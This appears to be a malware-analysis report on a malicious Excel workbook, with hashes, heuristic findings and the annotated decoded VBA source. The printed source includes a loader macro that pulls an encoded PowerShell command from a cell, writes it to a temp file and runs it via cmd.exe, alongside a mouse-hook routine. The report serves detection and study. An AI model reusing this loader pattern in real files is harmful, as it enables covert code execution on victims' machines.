Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 ac5682b58227bdde…

MALICIOUS

Office (OOXML) / .XLSX

29.5 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-08
MD5: c520e75d887f6428b610135b53810ce9 SHA-1: b453ce8d16afd0a8cd6df46411ca16c8e45b4483 SHA-256: ac5682b58227bddedea4d20f033e706cfe61969e1cfd761fba74283561881c80
308 Risk Score

Heuristics 8

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "cmd.exe /k """ & tempFile & """", 1
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        ts.Write "powershell.exe -NoP -NonI -Enc " & payload
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fso = CreateObject("Scripting.FileSystemObject")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        Shell "cmd.exe /k """ & tempFile & """", 1
  • VBA polls global keyboard state (keylogger) high OLE_VBA_KEYLOGGER_SPYWARE
    The macro declares or calls a Win32 keystroke-monitoring API (GetAsyncKeyState, SetWindowsHookEx WH_KEYBOARD, or GetKeyboardState) to capture keystrokes system-wide. No legitimate document automation polls global key state; this is the core of a VBA keylogger, usually paired with active-window capture (GetForegroundWindow) and a log file. A high-confidence spyware behaviour independent of any download / Shell evidence. In this sample the declared SetWindowsHookEx is installed with WH_MOUSE_LL (14), a low-level mouse hook, and no GetAsyncKeyState / GetKeyboardState call appears in the extracted source, so the keystroke-capture characterisation should be verified against the listing below.
    Matched line in script
        Private Declare PtrSafe Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below. Note that the extracted source below contains no Auto_Open / Workbook_Open procedure; if the compiled stream carries one, the p-code and the decompressed source disagree and should be compared.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        tempFile = Environ("TEMP") & "\loader.ps1"

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7767 bytes
SHA-256: e9c5d696621489e268b6baa40f36d236b695d677a6921cc5bb251bed3a5399e9
Preview script
First 1,000 lines of the extracted script
' Stream "ЭтаКнига" ("ThisWorkbook"); the VB_Base GUID {00020819-…} is the
' Excel Workbook class. Analyst note: no procedures follow in this stream, so
' there are no workbook-level event handlers (Workbook_Open, Workbook_BeforeClose)
' in the extracted source.
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet module "Лист1" ("Sheet1"); the VB_Base GUID {00020820-…} is the
' Excel Worksheet class. The two procedures below belong to this sheet.
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet event: Excel raises this whenever the selection on "Лист1" changes.
' On the first such change only (Static flag), it installs the module-level
' low-level mouse hook via УстановитьХукНаМышь (Module1) and shows
' "Трекинг мыши активирован!" ("Mouse tracking activated!").
' Analyst note: this is the effective trigger that arms the hook; the user only
' has to click a cell. "Лист2" carries an identical handler.
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    ' Static keeps its value between calls, so the hook is armed once while the
    ' project stays loaded.
    Static ХукУстановлен As Boolean
    If Not ХукУстановлен Then
        ХукУстановлен = True
        Call УстановитьХукНаМышь
        MsgBox "Трекинг мыши активирован!", vbInformation  ' can be removed
    End If
End Sub

' Intended to remove the hook when the workbook closes.
' Analyst note: Workbook_BeforeClose is an event of the ThisWorkbook (ЭтаКнига)
' module; inside a worksheet module it is an ordinary Private Sub that Excel
' does not raise, and nothing in the extracted source calls it. The hook is
' therefore presumably never removed before Excel exits — confirm dynamically.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    Call СнятьХук
End Sub

' Worksheet module "Лист2" ("Sheet2"); the VB_Base GUID {00020820-…} is the
' Excel Worksheet class. Its two procedures duplicate those of "Лист1".
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet event for "Лист2", identical to the handler in "Лист1": on the
' first selection change it installs the low-level mouse hook through
' УстановитьХукНаМышь (Module1) and shows "Трекинг мыши активирован!"
' ("Mouse tracking activated!"). Either sheet can arm the hook.
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
    ' Per-sheet one-shot guard; the hook handle itself lives in Module1.
    Static ХукУстановлен As Boolean
    If Not ХукУстановлен Then
        ХукУстановлен = True
        Call УстановитьХукНаМышь
        MsgBox "Трекинг мыши активирован!", vbInformation  ' can be removed
    End If
End Sub

' Duplicate of the "Лист1" procedure. Analyst note: as a Private Sub in a
' worksheet module this is not an event Excel raises, and nothing in the
' extracted source calls it, so it presumably never runs — confirm dynamically.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    Call СнятьХук
End Sub


Attribute VB_Name = "Module1"
Option Explicit

' =============================================
' API for the low-level mouse hook
' =============================================
' Analyst note: only mouse-hook APIs are declared here (SetWindowsHookEx,
' UnhookWindowsHookEx, CallNextHookEx, GetCurrentThreadId). No keyboard-state
' API (GetAsyncKeyState, GetKeyboardState) appears in the extracted source.
' The #If VBA7 branch uses PtrSafe/LongPtr for 64-bit-safe handles.
#If VBA7 Then
    Private Declare PtrSafe Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
        (ByVal idHook As Long, ByVal lpfn As LongPtr, ByVal hmod As LongPtr, ByVal dwThreadId As Long) As LongPtr
    Private Declare PtrSafe Function UnhookWindowsHookEx Lib "user32" (ByVal hhk As LongPtr) As Long
    Private Declare PtrSafe Function CallNextHookEx Lib "user32" _
        (ByVal hhk As LongPtr, ByVal nCode As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
    Private Declare PtrSafe Function GetCurrentThreadId Lib "kernel32" () As Long
#Else
    Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
        (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
    Private Declare Function UnhookWindowsHookEx Lib "user32" (ByVal hhk As Long) As Long
    Private Declare Function CallNextHookEx Lib "user32" _
        (ByVal hhk As Long, ByVal nCode As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    Private Declare Function GetCurrentThreadId Lib "kernel32" () As Long
#End If

' Win32 constants (values match the SDK). WH_MOUSE_LL = 14 is the low-level
' mouse hook id; the WM_* values are the mouse messages delivered in wParam.
Private Const WH_MOUSE_LL As Long = 14
Private Const WM_MOUSEWHEEL As Long = &H20A
Private Const WM_LBUTTONDOWN As Long = &H201   ' left click
Private Const WM_MOUSEMOVE As Long = &H200     ' mouse move

' Hook handle returned by SetWindowsHookEx; 0 means "not installed".
' NOTE(review): LongPtr exists only under VBA7, so the #Else branch above would
' not compile together with this declaration — presumably VBA7-only in practice.
Private hHook As LongPtr
' One-shot guard: the wheel action in MouseProc runs at most once.
Private УжеСработало As Boolean

' Win32 POINT (x, y); only used as the first member of MSLLHOOKSTRUCT below.
Private Type POINTAPI
    x As Long
    y As Long
End Type

' Mirrors the Win32 MSLLHOOKSTRUCT that a WH_MOUSE_LL hook receives through
' lParam. Analyst note: declared but never read in the extracted source —
' MouseProc passes lParam straight to CallNextHookEx without dereferencing it.
Private Type MSLLHOOKSTRUCT
    pt As POINTAPI
    mouseData As Long
    flags As Long
    time As Long
    dwExtraInfo As LongPtr
End Type

' =============================================
' Hook procedure — every mouse action passes through here
' =============================================
' Callback registered with AddressOf in УстановитьХукНаМышь.
' nCode = 0 is HC_ACTION (a real mouse event); wParam carries the WM_* message.
' Only WM_MOUSEWHEEL does anything: the first wheel event (guarded by the
' module flag УжеСработало) runs Действие_Колесико once. The click and move
' cases are empty stubs. Every event is forwarded with CallNextHookEx, so the
' hook does not swallow input. Returns the value from CallNextHookEx.
Public Function MouseProc(ByVal nCode As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
    If nCode = 0 Then
        Select Case wParam
            Case WM_MOUSEWHEEL
                ' Fire once per loaded project; the flag is never reset.
                If Not УжеСработало Then
                    УжеСработало = True
                    Call Действие_Колесико
                End If
                
            Case WM_LBUTTONDOWN
                ' A separate action on click could be added here (template stub)
                ' Call Действие_Клик
                
            Case WM_MOUSEMOVE
                ' Mouse movement — could be added, but would fire very often
                ' Static LastTime As Long
                ' If Abs(Timer - LastTime) > 1 Then
                '     LastTime = Timer
                '     Call Действие_Движение
                ' End If
        End Select
    End If
    
    ' Always chain to the next hook in the system.
    MouseProc = CallNextHookEx(hHook, nCode, wParam, lParam)
End Function

' =============================================
' Installing the hook
' =============================================
' "УстановитьХукНаМышь" ("InstallMouseHook"). If no hook is active (hHook = 0),
' installs a WH_MOUSE_LL hook with MouseProc as callback, hmod = 0 and the
' calling thread's id as dwThreadId. On failure shows
' "Не удалось установить хук мыши!" ("Failed to install the mouse hook!").
' NOTE(review): low-level hooks are documented as global (dwThreadId = 0);
' whether this call succeeds with a non-zero thread id should be confirmed
' dynamically — if it fails, Module1 is effectively inert.
Sub УстановитьХукНаМышь()
    If hHook = 0 Then
        hHook = SetWindowsHookEx(WH_MOUSE_LL, AddressOf MouseProc, 0, GetCurrentThreadId())
        If hHook = 0 Then
            MsgBox "Не удалось установить хук мыши!", vbCritical
        End If
    End If
End Sub

' "СнятьХук" ("RemoveHook"): unhooks and clears the module handle if one is set.
' Analyst note: its only callers are the Workbook_BeforeClose stubs in the
' worksheet modules, which Excel does not raise there.
Sub СнятьХук()
    If hHook <> 0 Then
        UnhookWindowsHookEx hHook
        hHook = 0
    End If
End Sub

' =============================================
' Your scripts (examples)
' =============================================
' "Действие_Колесико" ("WheelAction"): the one-shot payload of the mouse hook;
' simply delegates to the sheet-copy routine below. The header wording reads
' like template/tutorial code.
Sub Действие_Колесико()
    Call ПеренестиДанныеСЛист1НаЛист2
End Sub

' "ПеренестиДанныеСЛист1НаЛист2" ("TransferDataFromSheet1ToSheet2"): clears
' "Лист2" (creating it if absent) and copies the used range of "Лист1" to its
' A1, then reports "? Данные перенесены (по колесику мыши)!" ("Data transferred
' (via mouse wheel)!"). The leading "?" is probably a character lost in
' decoding — confirm against the raw stream.
' Analyst note: plain sheet housekeeping; no file, network or shell activity
' in this procedure.
Sub ПеренестиДанныеСЛист1НаЛист2()
    Dim ws1 As Worksheet, ws2 As Worksheet
    
    ' Missing-sheet errors are swallowed here, but only ws2 is checked below;
    ' if "Лист1" is absent, ws1 stays Nothing and ws1.UsedRange raises error 91
    ' with no handler active.
    On Error Resume Next
    Set ws1 = ThisWorkbook.Sheets("Лист1")
    Set ws2 = ThisWorkbook.Sheets("Лист2")
    On Error GoTo 0
    
    If ws2 Is Nothing Then
        Set ws2 = ThisWorkbook.Sheets.Add
        ws2.Name = "Лист2"
    End If
    
    ws2.Cells.Clear
    ws1.UsedRange.Copy Destination:=ws2.Range("A1")
    
    MsgBox "? Данные перенесены (по колесику мыши)!", vbInformation
End Sub

' Example of other actions (uncomment if needed) — commented-out template code;
' the message reads "Клик мышью!" ("Mouse click!").
' Sub Действие_Клик()
'     MsgBox "Клик мышью!", vbInformation
' End Sub


Attribute VB_Name = "Module2"
' kernel32!Sleep imported under the one-letter alias "s" (VBA7 and legacy
' forms). Analyst note: "s" is not referenced anywhere in the extracted source;
' the terse alias is unusual for hand-written workbook code.
#If VBA7 Then
    Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal d As Long)
#Else
    Private Declare Sub s Lib "kernel32" Alias "Sleep" (ByVal d As Long)
#End If

' "ВыполнитьОбработкуПлатежей" ("ProcessPayments") — the loader stage of the
' sample. Reads an encoded payload from cell AZ51 (unqualified Range in a
' standard module resolves against the active sheet), writes the single line
' "powershell.exe -NoP -NonI -Enc <payload>" to %TEMP%\loader.ps1 through
' Scripting.FileSystemObject, and hands that path to "cmd.exe /k" in a visible
' window. Run-time errors are shown to the user via MsgBox.
' Analyst notes:
'  - The encoded command lives in the worksheet cell, not in the VBA source;
'    AZ51 must be extracted from the workbook to recover it.
'  - Nothing in the extracted source calls this Sub and there is no
'    Auto_Open / Workbook_Open here; the trigger lies outside the visible VBA
'    (e.g. a control assignment) — confirm.
'  - Host artefacts: %TEMP%\loader.ps1 written by EXCEL.EXE, cmd.exe spawned
'    by EXCEL.EXE and, if the launcher runs, powershell.exe beneath it.
Sub ВыполнитьОбработкуПлатежей()
    On Error GoTo ErrorHandler
    
    ' The payload is fetched from the sheet, so the macro text alone does not
    ' reveal the command.
    Dim payload As String
    payload = Trim(Range("AZ51").Value)
    
    ' "AZ51 пустая!" = "AZ51 is empty!"
    If payload = "" Then
        MsgBox "AZ51 пустая!", vbCritical
        Exit Sub
    End If
    
    ' Save to a file and run it ("the most reliable way")
    Dim fso As Object, ts As Object
    Dim tempFile As String
    
    ' Drop path: %TEMP%\loader.ps1
    tempFile = Environ("TEMP") & "\loader.ps1"
    
    ' Late-bound FileSystemObject (CreateObject) — matches heuristic OLE_VBA_CREATEOBJ.
    Set fso = CreateObject("Scripting.FileSystemObject")
    
    ' Overwrites any existing file; the content is a command line, although the
    ' file carries a .ps1 extension.
    Set ts = fso.CreateTextFile(tempFile, True)
    ts.Write "powershell.exe -NoP -NonI -Enc " & payload
    ts.Close
    
    ' Launch with a visible window (window style 1 = vbNormalFocus)
    Shell "cmd.exe /k """ & tempFile & """", 1
    
    Exit Sub
    
ErrorHandler:
    ' "Ошибка N: description" = "Error N: description"
    MsgBox "Ошибка " & Err.Number & ": " & Err.Description, vbCritical
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 43520 bytes
SHA-256: e558ec064741f72e6f206a049220f39ce4b69ca936e0e5ca1625b2e525149bb9